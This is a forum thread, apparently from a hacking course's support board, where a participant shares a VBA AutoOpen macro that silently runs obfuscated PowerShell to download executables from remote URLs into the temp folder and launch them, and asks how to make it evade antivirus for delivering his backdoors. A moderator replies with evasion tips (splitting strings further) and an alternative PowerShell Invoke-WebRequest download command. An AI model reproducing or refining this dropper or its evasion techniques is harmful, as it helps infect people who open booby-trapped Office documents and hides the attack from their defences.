Tagged: 

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #43732
    y4gud007
    Participant

    Hi

    I would like to know if there is a way I could generate an undetected generic macro, A minimum of 9 antivirus keeps detecting the one used by Zaid in the social engineering course, no matter how much tweaking… meanwhile the 2 evil files embedded are 100% cleaned

    Sub AutoOpen()
    Dim sk As String
    sk = “p”
    sk = “o”
    sk = sk + “w”
    sk = sk + “er”
    sk = sk + “s”
    sk = sk + “he”
    sk = sk + “ll ”
    sk = sk + “-NoP -NonI -W Hidden “””

    sk = sk + “(‘https://blahblah’,’https://blahblah’)”

    sk = sk + “|foreach{$fileName=$env:temp+’\’+(Split-Path -Path $_ -Leaf);”

    sk = sk + “(new-object System.Net.WebClient).DownloadFile($_,$fileName);”

    sk = sk + “Invoke-Item $fileName;}”

    sk = sk + “”””

    VBA.CreateObject(“WScript.Shell”).Run sk, 0

    End Sub

    #43773
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Basically bypassing AV programs is like a game of cat and mouse, so backdoors might start getting detected at some stage, then the developers release an update, this will allow you to generate undetectable backdoors, then AV programs release an update which will make backdoors detectable ……..

    So you need to keep trying different things, try to split it more.

    Hope it helps!
    Diego

    #43834
    y4gud007
    Participant

    Hi Diego,

    Thanks for your response,
    I understood that we need to play around with backdoors to bypass AV, what I am asking is how to generate a generic VBA command/powershell code which I could use in Microsoft office macro to allows download and execution of external .exe file just like the above generic download and execute macro, instead of a payload that require us to listen back via empire, veil etc. I created my FUD .exe backdoors already, I only need a generic download and execute powershell/VBA script that would run the code when macro is enabled, The above generic download and execute macro used by Zaid in the course does not bypass AV anymore no matter how the tweaking, which is very normal considering the lecture recorded time.

    Is there a way I could get this done?

    Thanks

    #43869
    Diego PérezDiego Pérez
    Moderator

    Hi!
    That’s the proper way to use powershell to download and execute a file, you can try to use another option, using Invoke-WebRequest, but it also might be flaged by the AV.
    The command would be:
    powershell iwr -uri http://<your address here> -outfile <name of the file>

    Try using it.

    Let me know how it goes!
    Diego

Viewing 4 posts - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.